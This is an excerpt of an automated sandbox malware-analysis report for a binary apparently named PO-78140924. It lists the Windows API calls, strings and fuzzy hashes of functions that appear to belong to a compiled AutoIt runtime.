                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00012990
                                                • GetClientRect.USER32(00000000,000000FF), ref: 000129AE
                                                • GetStockObject.GDI32(00000011), ref: 000129CA
                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 000129D5
                                                  • Part of subcall function 00012344: GetCursorPos.USER32(?), ref: 00012357
                                                  • Part of subcall function 00012344: ScreenToClient.USER32(000D57B0,?), ref: 00012374
                                                  • Part of subcall function 00012344: GetAsyncKeyState.USER32(00000001), ref: 00012399
                                                  • Part of subcall function 00012344: GetAsyncKeyState.USER32(00000002), ref: 000123A7
                                                • SetTimer.USER32(00000000,00000000,00000028,Function_00001256), ref: 000129FC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                • String ID: AutoIt v3 GUI
                                                • API String ID: 1458621304-248962490
                                                • Opcode ID: 834edc5586d2a957e5964c067f41a456c27fc6b39d1e166fed70894dcebdaabb
                                                • Instruction ID: be0ea220b9c5d51f42b2dbfc1b8a1e019cef9f50b12b69fe539d2a3a1a7932a5
                                                • Opcode Fuzzy Hash: 834edc5586d2a957e5964c067f41a456c27fc6b39d1e166fed70894dcebdaabb
                                                • Instruction Fuzzy Hash: E3B17D71A0160AEFEB54DFA8DD45BED7BB4FB08311F10422AFA15E72A0DB749851CB60
                                                APIs
                                                  • Part of subcall function 00017D2C: _memmove.LIBCMT ref: 00017D66
                                                • GetForegroundWindow.USER32 ref: 00026042
                                                • IsWindow.USER32(?), ref: 00060F79
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Window$Foreground_memmove
                                                • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                • API String ID: 3828923867-1919597938
                                                • Opcode ID: 12cf257afd6202a2f4a899d0254b276fe42fb0a4f803c66f88504e245e6b6f33
                                                • Instruction ID: f6b82622b7f7403258d908117008210c7dc0e9b960e3884e6babae0e0808a366
                                                • Opcode Fuzzy Hash: 12cf257afd6202a2f4a899d0254b276fe42fb0a4f803c66f88504e245e6b6f33
                                                • Instruction Fuzzy Hash: 56D1C730108702ABCB64EF20C8919EFBBE6BF54340F14462DF45A575A3DB31EA99CB91
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: __wcsnicmp
                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                • API String ID: 1038674560-1810252412
                                                • Opcode ID: d6a94df104afa6def5ca134d4211eb18c83c88d59a410a6ff3d8702867e3ee36
                                                • Instruction ID: 986aa70163a60160c64af93959dd34a43c9c916bf329a15064c772a1f69306d5
                                                • Opcode Fuzzy Hash: d6a94df104afa6def5ca134d4211eb18c83c88d59a410a6ff3d8702867e3ee36
                                                • Instruction Fuzzy Hash: BB31A271A48209A6EB24EB61CC53FEF77B99F10710F600419B529B90D3EF616F84CA52
                                                APIs
                                                • _memset.LIBCMT ref: 000145F9
                                                • GetMenuItemCount.USER32(000D5890), ref: 0004D6FD
                                                • GetMenuItemCount.USER32(000D5890), ref: 0004D7AD
                                                • GetCursorPos.USER32(?), ref: 0004D7F1
                                                • SetForegroundWindow.USER32(00000000), ref: 0004D7FA
                                                • TrackPopupMenuEx.USER32(000D5890,00000000,?,00000000,00000000,00000000), ref: 0004D80D
                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0004D819
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                • String ID: 0
                                                • API String ID: 2751501086-4108050209
                                                • Opcode ID: b318c171d99709cc9504c544cf58c3fb3b71cbf3033a8578d258cd1247d83edb
                                                • Instruction ID: 58d152e8a36cbfc7cb208d8f915cb106ac2daf98b82cc5fc2cdbdd3c498d00b8
                                                • Opcode Fuzzy Hash: b318c171d99709cc9504c544cf58c3fb3b71cbf3033a8578d258cd1247d83edb
                                                • Instruction Fuzzy Hash: 7971D270604205BFEB309F54DC45FEABFA4FB05368F204227F619A61E1C7B56860DB59
                                                APIs
                                                • __set_osfhnd.LIBCMT ref: 00048304
                                                  • Part of subcall function 0003D6AA: SetStdHandle.KERNEL32(000000F6,00048309,00000001,0009FB24,00000000,?,00048309,0009FB24,00000040,?,?,?,?,?,00000000,00000109), ref: 0003D6FD
                                                • __lseeki64_nolock.LIBCMT ref: 0004836E
                                                  • Part of subcall function 00038C74: __getptd_noexit.LIBCMT ref: 00038C74
                                                • __close_nolock.LIBCMT ref: 00048394
                                                  • Part of subcall function 00040C5D: CloseHandle.KERNELBASE(00000000,0009FB24,00000000,?,00048399,0009FB24,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00040CAD
                                                  • Part of subcall function 00040C5D: GetLastError.KERNEL32(?,00048399,0009FB24,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00040CB7
                                                  • Part of subcall function 00040C5D: __free_osfhnd.LIBCMT ref: 00040CC4
                                                  • Part of subcall function 00040C5D: __dosmaperr.LIBCMT ref: 00040CE6
                                                • CloseHandle.KERNEL32(00000040,?,?,?,?,?,00000000,00000109), ref: 0004869A
                                                • ___createFile.LIBCMT ref: 000486B9
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 000486C6
                                                • __dosmaperr.LIBCMT ref: 000486CD
                                                • __free_osfhnd.LIBCMT ref: 000486ED
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Handle$CloseErrorLast__dosmaperr__free_osfhnd$File___create__close_nolock__getptd_noexit__lseeki64_nolock__set_osfhnd
                                                • String ID: @$t"=$t"=$t)=$t)=$tD=
                                                • API String ID: 3527355902-3051076874
                                                • Opcode ID: 2b870520fc452498776de6f5a13cd4a90052098437077cb1591a862899850520
                                                • Instruction ID: f2fe361aa1597dc4749b2867442c2e18181872a8ced39e2282961b75a21c73d6
                                                • Opcode Fuzzy Hash: 2b870520fc452498776de6f5a13cd4a90052098437077cb1591a862899850520
                                                • Instruction Fuzzy Hash: 00518AB19051025BDF69CF18E8917FC7BA1AB41310F19CA79EA61AB3D2CF3A8D50C749
                                                APIs
                                                • _memset.LIBCMT ref: 0007283A
                                                • GetMenuItemInfoW.USER32(000D5890,000000FF,00000000,00000030), ref: 0007289B
                                                • SetMenuItemInfoW.USER32(000D5890,00000004,00000000,00000030), ref: 000728D1
                                                • Sleep.KERNEL32(000001F4), ref: 000728E3
                                                • GetMenuItemCount.USER32(?), ref: 00072927
                                                • GetMenuItemID.USER32(?,00000000), ref: 00072943
                                                • GetMenuItemID.USER32(?,-00000001), ref: 0007296D
                                                • GetMenuItemID.USER32(?,?), ref: 000729B2
                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 000729F8
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00072A0C
                                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00072A2D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                • String ID: 0
                                                • API String ID: 4176008265-4108050209
                                                • Opcode ID: 7d121a74dd6323fbbd2c8093d1ddb69aecb6c403ec43fd7e5fbe16d72ad68ed4
                                                • Instruction ID: 22c926b36c4f10a0dba286c6e4f89c3a5fd198a932e2429b66c7c8322b15ab03
                                                • Opcode Fuzzy Hash: 7d121a74dd6323fbbd2c8093d1ddb69aecb6c403ec43fd7e5fbe16d72ad68ed4
                                                • Instruction Fuzzy Hash: BD61C170D00249AFEB61CF64CC88EBE7BB8FB45304F14806AF946A3251D739AD45DB25
                                                APIs
                                                • __close_nolock.LIBCMT ref: 00048394
                                                • __lseeki64_nolock.LIBCMT ref: 000483D6
                                                • CloseHandle.KERNEL32(00000040,?,?,?,?,?,00000000,00000109), ref: 0004869A
                                                • ___createFile.LIBCMT ref: 000486B9
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 000486C6
                                                • __dosmaperr.LIBCMT ref: 000486CD
                                                • __free_osfhnd.LIBCMT ref: 000486ED
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: CloseErrorFileHandleLast___create__close_nolock__dosmaperr__free_osfhnd__lseeki64_nolock
                                                • String ID: t"=$t"=$t)=$t)=$tD=
                                                • API String ID: 1689960631-2384938829
                                                • Opcode ID: 1690c2df269e4b53be1c94f2cf2557604e617211a0ee799dde8c32650593ff2e
                                                • Instruction ID: ed1576d16f81141702c165733651f70c19a5085b9bb1fa761924ef2f7fafe621
                                                • Opcode Fuzzy Hash: 1690c2df269e4b53be1c94f2cf2557604e617211a0ee799dde8c32650593ff2e
                                                • Instruction Fuzzy Hash: A25177F19011125BDF698F18E8917FD37A1AB41310F29CA39EA25E72E2CB39CD90C749
                                                APIs
                                                  • Part of subcall function 0006F1FE: VariantInit.OLEAUT32(?), ref: 0006F218
                                                  • Part of subcall function 0006F1FE: VariantClear.OLEAUT32(00000013), ref: 0006F28A
                                                  • Part of subcall function 0006F1FE: VariantClear.OLEAUT32(?), ref: 0006F35C
                                                • VariantClear.OLEAUT32(?), ref: 0006E580
                                                • VariantInit.OLEAUT32(?), ref: 0006E5E3
                                                  • Part of subcall function 0006F09A: SysStringLen.OLEAUT32(?), ref: 0006F0A7
                                                  • Part of subcall function 0006F09A: lstrcpyW.KERNEL32(00000000,?,?,0006E43F,?,?,?,?,?,?,?,?,?,?,00000024), ref: 0006F0D8
                                                • VariantClear.OLEAUT32(?), ref: 0006E442
                                                • VariantClear.OLEAUT32(?), ref: 0006E464
                                                  • Part of subcall function 0006EF15: CLSIDFromString.COMBASE(?,00000000), ref: 0006EF37
                                                • DispCallFunc.OLEAUT32(00000008,?,?,00000015,?,?,?,?), ref: 0006E649
                                                • VariantClear.OLEAUT32(?), ref: 0006E65B
                                                • VariantCopy.OLEAUT32(?,?), ref: 0006E6C7
                                                  • Part of subcall function 0006F16B: VariantCopyInd.OLEAUT32(?,?), ref: 0006F195
                                                  • Part of subcall function 0006F16B: VariantClear.OLEAUT32(?), ref: 0006F1AC
                                                • VariantClear.OLEAUT32(?), ref: 0006E752
                                                • VariantClear.OLEAUT32(?), ref: 0006E76B
                                                • VariantClear.OLEAUT32(?), ref: 0006E7F1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Variant$Clear$CopyInitString$CallDispFromFunclstrcpy
                                                • String ID: $@
                                                • API String ID: 691162671-3337466569
                                                • Opcode ID: 92082985d704e32ae4323aae97aa1631bcc5705fdadeb3fad7612fc57f774044
                                                • Instruction ID: 5f153b662f832a743f75ea947c040707dc26475274a020186ee1194a9ab050e4
                                                • Opcode Fuzzy Hash: 92082985d704e32ae4323aae97aa1631bcc5705fdadeb3fad7612fc57f774044
                                                • Instruction Fuzzy Hash: D3E1CCB9A04351AFD760DF28C884A6ABBE5FF88754F10482EFA85D7261D730EC45CB52
                                                APIs
                                                • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00079D09
                                                  • Part of subcall function 00017F41: _memmove.LIBCMT ref: 00017F82
                                                • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00079D2A
                                                • _wprintf.LIBCMT ref: 00079E43
                                                • _wprintf.LIBCMT ref: 00079E61
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: LoadString_wprintf$_memmove
                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                • API String ID: 3536794898-3080491070
                                                • Opcode ID: 9f6a3376bc4e51ff9a727eea6066942115441700862eae85482f95a88aba048e
                                                • Instruction ID: 4b3fbea9ea8a46739e7dbb349e3f2d49a2bc9082f5bd09043eb6716b2fb70938
                                                • Opcode Fuzzy Hash: 9f6a3376bc4e51ff9a727eea6066942115441700862eae85482f95a88aba048e
                                                • Instruction Fuzzy Hash: 9F519431D00609AADF15EBE0CD82EEEB7B9AF08300F544165F50976092DF752F99DBA1
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                • String ID: 0.0.0.0
                                                • API String ID: 208665112-3771769585
                                                • Opcode ID: f0e9df693a9967cc43f5e8905c9adf49a9741484a1262d4e894b33e37fea23db
                                                • Instruction ID: fa9141b5b74a0555e2e7ad8554f446961789558f3b0123f468037b4e9fbe01fb
                                                • Opcode Fuzzy Hash: f0e9df693a9967cc43f5e8905c9adf49a9741484a1262d4e894b33e37fea23db
                                                • Instruction Fuzzy Hash: BA110531A081056FDB25A7609C4AEEA77ECEB02711F0041B6F548D6092EF789A81C654
                                                APIs
                                                  • Part of subcall function 000125DB: GetWindowLongW.USER32(?,000000EB), ref: 000125EC
                                                • GetSysColor.USER32(0000000F), ref: 000121D3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ColorLongWindow
                                                • String ID:
                                                • API String ID: 259745315-0
                                                • Opcode ID: f0593db1eef8d5621d674fe2221761916609e202dabe935a6cc434365b27e9c8
                                                • Instruction ID: 94bf11fc9b4f62490d6e2c7331fba77eca185ce90ab48af0e9b79a74d3207d3d
                                                • Opcode Fuzzy Hash: f0593db1eef8d5621d674fe2221761916609e202dabe935a6cc434365b27e9c8
                                                • Instruction Fuzzy Hash: E7418231100540EBEB655F28EC88BFD3BA5EB06731F184276FE658A1E5C7358CA2DB61
                                                APIs
                                                • _memset.LIBCMT ref: 00036FBB
                                                  • Part of subcall function 00038CA8: __getptd_noexit.LIBCMT ref: 00038CA8
                                                • __gmtime64_s.LIBCMT ref: 00037054
                                                • __gmtime64_s.LIBCMT ref: 0003708A
                                                • __gmtime64_s.LIBCMT ref: 000370A7
                                                • __allrem.LIBCMT ref: 000370FD
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00037119
                                                • __allrem.LIBCMT ref: 00037130
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0003714E
                                                • __allrem.LIBCMT ref: 00037165
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00037183
                                                • __invoke_watson.LIBCMT ref: 000371F4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                • String ID:
                                                • API String ID: 384356119-0
                                                • Opcode ID: 4d22540c68ea1db1b5775825e39e2d75ecb8b9a36265a6d6dcb95d4495ed4413
                                                • Instruction ID: f5073ea944dd73c2d27994ec6f05a38161db8198cb718c998f46f0bb176a9a04
                                                • Opcode Fuzzy Hash: 4d22540c68ea1db1b5775825e39e2d75ecb8b9a36265a6d6dcb95d4495ed4413
                                                • Instruction Fuzzy Hash: EC711AB2A00716AFE7259E7DCC41B9AB3ECAF01320F148139F518D7282E771D9408BD0
                                                APIs
                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00066F15
                                                • SafeArrayAllocData.OLEAUT32(?), ref: 00066F6E
                                                • VariantInit.OLEAUT32(?), ref: 00066F80
                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00066FA0
                                                • VariantCopy.OLEAUT32(?,?), ref: 00066FF3
                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00067007
                                                • VariantClear.OLEAUT32(?), ref: 0006701C
                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 00067029
                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00067032
                                                • VariantClear.OLEAUT32(?), ref: 00067044
                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0006704F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                • String ID:
                                                • API String ID: 2706829360-0
                                                • Opcode ID: d8914a92779e136ccc4d46b007d2b3053400e6b2c9e164fc27c670f1dda28abe
                                                • Instruction ID: 267b19a771f3156669d4ce965d6627f4772c1375ed67bcace0c48ff3370f6f98
                                                • Opcode Fuzzy Hash: d8914a92779e136ccc4d46b007d2b3053400e6b2c9e164fc27c670f1dda28abe
                                                • Instruction Fuzzy Hash: 0F414F35A04219EFDB10DFA4D8489EEBBB9FF48314F008069F955E7261DB35A945CFA0
                                                APIs
                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0001FC06
                                                • OleUninitialize.OLE32(?,00000000), ref: 0001FCA5
                                                • UnregisterHotKey.USER32(?), ref: 0001FDFC
                                                • DestroyWindow.USER32(?), ref: 0005492F
                                                • FreeLibrary.KERNEL32(?), ref: 00054994
                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 000549C1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                • String ID: close all
                                                • API String ID: 469580280-3243417748
                                                • Opcode ID: 88f495c4b27b3b26405d904c90668dcea5e9d32bcc2fcf4f5a0a7250283dbcc4
                                                • Instruction ID: 2e364fd99d6c1ef4fd15b0119c79030963555f00f2365a40eb5f70898985fedc
                                                • Opcode Fuzzy Hash: 88f495c4b27b3b26405d904c90668dcea5e9d32bcc2fcf4f5a0a7250283dbcc4
                                                • Instruction Fuzzy Hash: 9FA1A330701212CFCB69EF10C595AFAF3A4BF04705F5442ADE80AAB252DB30AD96CF91
                                                APIs
                                                • SetWindowLongW.USER32(?,000000EB), ref: 00012EAE
                                                  • Part of subcall function 00011DB3: GetClientRect.USER32(?,?), ref: 00011DDC
                                                  • Part of subcall function 00011DB3: GetWindowRect.USER32(?,?), ref: 00011E1D
                                                  • Part of subcall function 00011DB3: ScreenToClient.USER32(?,?), ref: 00011E45
                                                • GetDC.USER32 ref: 0004CEB2
                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0004CEC5
                                                • SelectObject.GDI32(00000000,00000000), ref: 0004CED3
                                                • SelectObject.GDI32(00000000,00000000), ref: 0004CEE8
                                                • ReleaseDC.USER32(?,00000000), ref: 0004CEF0
                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0004CF7B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                • String ID: U
                                                • API String ID: 4009187628-3372436214
                                                • Opcode ID: 73d2a25046b05013d3480cad528a0985e571075486e2f85f154c01f9a3743562
                                                • Instruction ID: 3d40a1a24db0a4a5077da756d104536aa29b1593cd01baf851bc1c5704b7ed2f
                                                • Opcode Fuzzy Hash: 73d2a25046b05013d3480cad528a0985e571075486e2f85f154c01f9a3743562
                                                • Instruction Fuzzy Hash: 8A71BD70501205DFEFA18F64C880AFA7BF6FF48320F14427AED559A2A6C7358895DB60
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: __i64tow__itow
                                                • String ID: %.15g$0x%p$False$True
                                                • API String ID: 1776342733-2263619337
